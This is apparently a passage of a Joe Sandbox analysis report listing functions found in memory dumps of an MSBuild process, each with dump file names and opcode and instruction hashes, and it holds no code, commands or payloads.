                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: d88a0050c2d516acd64a70350079c9970b9474ce8040a11425443973ad92fa14
                                                                                                                                                                                                                                                • Instruction ID: 7b5c6737d110b6705a2984a34e22c707fe65509977157f538daa4f4ef3bf3572
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d88a0050c2d516acd64a70350079c9970b9474ce8040a11425443973ad92fa14
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3CE026302043425BCB12D731E8808967BE5DF493203058967D959CB611EB60F841CF91
                                                                                                                                                                                                                                                Function 0709064B Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 0b6f1e0d3274c012ef93bae569aae1f9605a46aa6946d6730c8687974cfee659
                                                                                                                                                                                                                                                • Instruction ID: 1fe44da260ed98d712b87475b7dc20f5862528b96939f4dcc9797c482a985a96
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0b6f1e0d3274c012ef93bae569aae1f9605a46aa6946d6730c8687974cfee659
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6CE0D838905344AFC700DB60F801969BF78BB81304F1441DADC4457382C7315F15DB91
                                                                                                                                                                                                                                                Function 071B8B40 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 98199f9bc7556d17e0673f10313f443e43581883fcbd6a1bf05eaeee832a3356
                                                                                                                                                                                                                                                • Instruction ID: d7ceb21b86af072fa5eaa0e0c26ba1e5275eabfcbfeb34c2588df1a888eb943d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 98199f9bc7556d17e0673f10313f443e43581883fcbd6a1bf05eaeee832a3356
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DDD05E72305211270715695E688846BBA8FE7C9965354403AFA0AC3344DE909C0246D0
                                                                                                                                                                                                                                                Function 072A49D8 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 1be046ae82ecba982f87cb635e7df0448a548b4a486a77286d4db9c70dac0029
                                                                                                                                                                                                                                                • Instruction ID: 0140af7b56c7b6dfe1b5ef09e597151cb45c7b257454a05a702c523b28aa20dd
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1be046ae82ecba982f87cb635e7df0448a548b4a486a77286d4db9c70dac0029
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 70D0CD373002047B4B145D95A800C6BBB6FEBC4720304812DFA4146100CB71BC159794
                                                                                                                                                                                                                                                Function 071BED80 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: e93bb23ef98f809709ae1dea3090f134c5a4b6cc8661ca2e8516699fafbde3bd
                                                                                                                                                                                                                                                • Instruction ID: 1651d0dbf54f316f5bd73dc27a6533d8e5389a63cad156300187ca3662b00c32
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e93bb23ef98f809709ae1dea3090f134c5a4b6cc8661ca2e8516699fafbde3bd
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 24E0C2F53102245F8604F365D85189D3396BFC812030107DAD9095F7A1CF60AC058FDA
                                                                                                                                                                                                                                                Function 07091770 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: b9791beedf84b360c0e4d9253d4637315ad55c83ade52ba4b49039ce9b0f66c1
                                                                                                                                                                                                                                                • Instruction ID: 44cae93617120034ed733b7535b1a6a75acc66dbe7e2633f7a3b2adf0fced979
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b9791beedf84b360c0e4d9253d4637315ad55c83ade52ba4b49039ce9b0f66c1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 20E07574E00209EFCB94DFA8E54569DFBF5EB88304F1081AA981893340D7359A41DF81
                                                                                                                                                                                                                                                Function 07091600 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 53e4c6df6bb1fe284cac2660094989d112872d5c779f658aef70cabae5ab16b1
                                                                                                                                                                                                                                                • Instruction ID: 21517c1aba97080ba7279f985572af327108841a74771f3f11c7a7ac5048c6f4
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 53e4c6df6bb1fe284cac2660094989d112872d5c779f658aef70cabae5ab16b1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 18E0E5B0E0520FDFDF24DFA0C5587EDBBB1AB09315F185529D0127A280CB784589DF95
                                                                                                                                                                                                                                                Function 072ACD38 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: f38a171be738c3287c3bbb1e99180fd611f94e31c25744e401404b7565c862b7
                                                                                                                                                                                                                                                • Instruction ID: e48e4b8b78fa98e62b45ef6dcc69015665a0c94333391ce033dcf0f182579c4b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f38a171be738c3287c3bbb1e99180fd611f94e31c25744e401404b7565c862b7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 67D05BB234061477C614E549D800D5BB79E9BD4631F04867AF6158B294CAA1AC0287E5
                                                                                                                                                                                                                                                Function 071B2D98 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 18842770a4b0e701db1d3401f31104cd668dabc4069b5689348b8d39bc6665cc
                                                                                                                                                                                                                                                • Instruction ID: 30e648d5052dbd55f321f7dcf7afdd0bf07860b82f80117b198f2ce8487bd076
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 18842770a4b0e701db1d3401f31104cd668dabc4069b5689348b8d39bc6665cc
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 97D0A7F2254114ABC7128BA8DC05EE27FAEFB04719F108165F44DC3563E337E8938691
                                                                                                                                                                                                                                                Function 071B2DD1 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 7999374d41605ece54b36f0e1fc45aacc7538b4b1608ba0b7a26279ffd173ebc
                                                                                                                                                                                                                                                • Instruction ID: 5fa39839b48643087ad2c837da1ef3308230689e5480e0b48d36c47d9133ddf4
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7999374d41605ece54b36f0e1fc45aacc7538b4b1608ba0b7a26279ffd173ebc
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 11E0C2B2514288EFC310CB64D148E907FDAEB01304F46C8A5E048CB143C779EC80C750
                                                                                                                                                                                                                                                Function 07096888 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 3442bcf7444aba7cac9c99a7a9008e5fb474b9895f5234fd5436003fd7bfd9f4
                                                                                                                                                                                                                                                • Instruction ID: 73ee56776d9df090d2cd810430040d8aa5f1723acdf3822f309ff5984d7492e7
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3442bcf7444aba7cac9c99a7a9008e5fb474b9895f5234fd5436003fd7bfd9f4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 78E0B670E0430CAFCB44EFA9D44459DBBF5EF48310F0085E9D809E7350EA346A048F85
                                                                                                                                                                                                                                                Function 071BFEC8 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: a04cd8cf0993c95f0a481b2fde10a32fb246d15242a11835475b031c6d5c197e
                                                                                                                                                                                                                                                • Instruction ID: 159c4a54e4bc72d49dee72200470c51a6b0fc36e5732c93667299a263a0b11ca
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a04cd8cf0993c95f0a481b2fde10a32fb246d15242a11835475b031c6d5c197e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7AE0EC74900208EFC794EFA8E94579CBBF4EB48204F2081AAC808D3341E7329E42DB91
                                                                                                                                                                                                                                                Function 07091488 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: dec3397c3f075ede51bbdd07c4eecd73c1fbb6d2c1d7a92238316a8307754ce8
                                                                                                                                                                                                                                                • Instruction ID: 773fd335a9b49f47125899ebd9978894fb20b779d9f90266d2d1e53d38a96db1
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dec3397c3f075ede51bbdd07c4eecd73c1fbb6d2c1d7a92238316a8307754ce8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 83E0EC74E00209EFCB84EFA8E54579CBBF4EF48214F2481A98808D3341E7729E41DB81
                                                                                                                                                                                                                                                Function 07090658 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: a81c6190067f835e44970a9e607fea9bfb19d5c7d12f879c546d855da960c1d2
                                                                                                                                                                                                                                                • Instruction ID: a58f819d0971044ac6ffee01645040055a41b468b582e697a6e2b2d0a1cc368e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a81c6190067f835e44970a9e607fea9bfb19d5c7d12f879c546d855da960c1d2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9DE01274904209DBCB04DFA4E545A5DBBB4FB85304F1082ADC80417341C7329E42DB81
                                                                                                                                                                                                                                                Function 0709EF00 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 31d115547bdb9e54e83c60aca2acc51be909adb07f556d37e172ed874afc96dd
                                                                                                                                                                                                                                                • Instruction ID: 5b36bc7040cc73dc59c2ae0584afdf71fabf4131503d8041e2e3ca85333969df
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 31d115547bdb9e54e83c60aca2acc51be909adb07f556d37e172ed874afc96dd
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0BD05E71200716479E24D626E840496B3DADF882303048629A95A87610EF60F8018BD5
                                                                                                                                                                                                                                                Function 072A6939 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: a4eb4446ae60e3920dbe97e5a6e3475d2f88e2ac24bab62f71b6816e7ef1c7c3
                                                                                                                                                                                                                                                • Instruction ID: dbc8f4edf69ce970cf61e5f0a38708b0538b5b1048597a148e6be8d57152174a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a4eb4446ae60e3920dbe97e5a6e3475d2f88e2ac24bab62f71b6816e7ef1c7c3
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B0D0A97A04D3A84FCB02A73178531D23F688A0253472402CBE0084B8239549698C83AA
                                                                                                                                                                                                                                                Function 072A6850 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: c13c5ab16c88bf85662264ad7822e3f94bb2749e3ed1568d6e7d2ec45639c8f0
                                                                                                                                                                                                                                                • Instruction ID: 1a5fc44f5cc73370b74a939cbec64cbbd0abaad30c3f06dcc1ae820741f4d371
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c13c5ab16c88bf85662264ad7822e3f94bb2749e3ed1568d6e7d2ec45639c8f0
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7FC0122A20A2882FFB0292317E0B3F13F258B42531F098583E080D9C828C2A008982A6
                                                                                                                                                                                                                                                Function 071B2DE0 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 5c5c0d9c0c99cb2802b90ca4aba16666eb586aad1c22a690111ae8c215df88e8
                                                                                                                                                                                                                                                • Instruction ID: 30022a78dbfa2a8df6927d018dad70612522249ee0ef983fad9897dcecd460d5
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5c5c0d9c0c99cb2802b90ca4aba16666eb586aad1c22a690111ae8c215df88e8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F2E017B2200248EFC710DF58C088E91BBEABB09244F86C895E809CB252C334ED44CB54
                                                                                                                                                                                                                                                Function 071B7898 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 25bf37f566009a931e14b18a215cfa265d9aec97971c63dfbafaca2307d71b66
                                                                                                                                                                                                                                                • Instruction ID: 1b6e4e692b4b568ac2ba930f807272ca9292c11dd70cfc58483fb6dc5e4f5de4
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 25bf37f566009a931e14b18a215cfa265d9aec97971c63dfbafaca2307d71b66
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5DD022A2A1D1A47BC3011244A800ADABFCD4B86712F050062E448C2280E20A480241F2
                                                                                                                                                                                                                                                Function 07097F87 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 6257393a4edd3cbddfd5a4ae5e4641eb4fe75ebe8ad19ca252048341ba37e5d4
                                                                                                                                                                                                                                                • Instruction ID: 43266f7ad53baaafd8b121a2910da76e8402bf9517bbb7d4dbb9c0b748e3d182
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6257393a4edd3cbddfd5a4ae5e4641eb4fe75ebe8ad19ca252048341ba37e5d4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CDD0A93004E3CA2FC303A3B1A8A04D43F7CAE8712874803E3E4858B457A31C294BC766
                                                                                                                                                                                                                                                Function 071B2DA8 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: f0d501aeb09dd5707b56c638c7847f5d81747a55d859508a697de2d91a8af04e
                                                                                                                                                                                                                                                • Instruction ID: 186537ed50e5a67683d3c5dfa50b9e4ddc346161831242c524ac34eb586b4585
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f0d501aeb09dd5707b56c638c7847f5d81747a55d859508a697de2d91a8af04e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D3D0C9723002089FDF509BB4E80995677EAFB8865971185A5F40DC7612E73AE812CA50
                                                                                                                                                                                                                                                Function 071B7E44 Relevance: .0, Instructions: 14COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 13e15abc94579025cf133303fcb4b2c09d918199501221952e2c5a2f87b168dc
                                                                                                                                                                                                                                                • Instruction ID: 7e46ca497bf0c0617d7a5d333b0f21bf34c313b1f8ec0a2db89ee200161a506e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 13e15abc94579025cf133303fcb4b2c09d918199501221952e2c5a2f87b168dc
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F8D01275B00004DFCB44DBADE8406DC7BF5EFC9625B0044BAE209C7660DB309C158F90
                                                                                                                                                                                                                                                Function 071B7ED9 Relevance: .0, Instructions: 14COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: ea281927cce8e466d46e99090c2b605c860c4a0e3b447f458cb9aa9981ba6e6b
                                                                                                                                                                                                                                                • Instruction ID: a5a2a063614283b38e2c0c1576d5e75592974c76ecbebb7051f935f0d1649700
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ea281927cce8e466d46e99090c2b605c860c4a0e3b447f458cb9aa9981ba6e6b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F3D01275B00014CFCB48DFACE8046DD7BF5EFC9625B1100AAE209CBA65DB30DD148B91
                                                                                                                                                                                                                                                Function 072AACC2 Relevance: .0, Instructions: 14COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: c13fc5e077fbb94bd62af2649ab643ca0b503ec4ca91025befe145cf812cc00e
                                                                                                                                                                                                                                                • Instruction ID: ccedcd1a7444025e443ec9b9964ad6973f4f02279cdb2ef95fe8205052ab2572
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c13fc5e077fbb94bd62af2649ab643ca0b503ec4ca91025befe145cf812cc00e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 44D0121520E3E04BC303533578551C97F902D8742030A41DBE484CB263D5188E8A83E7
                                                                                                                                                                                                                                                Function 071B7FD4 Relevance: .0, Instructions: 13COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 5129908f0b0b88e96a0dc877cd033a5497a041c5d7397c4bf25d6e8bfa06fed7
                                                                                                                                                                                                                                                • Instruction ID: 59087caeb6152f575e0a7430c8489f6c1de32151a10aba7f03ff655bf5bfadd3
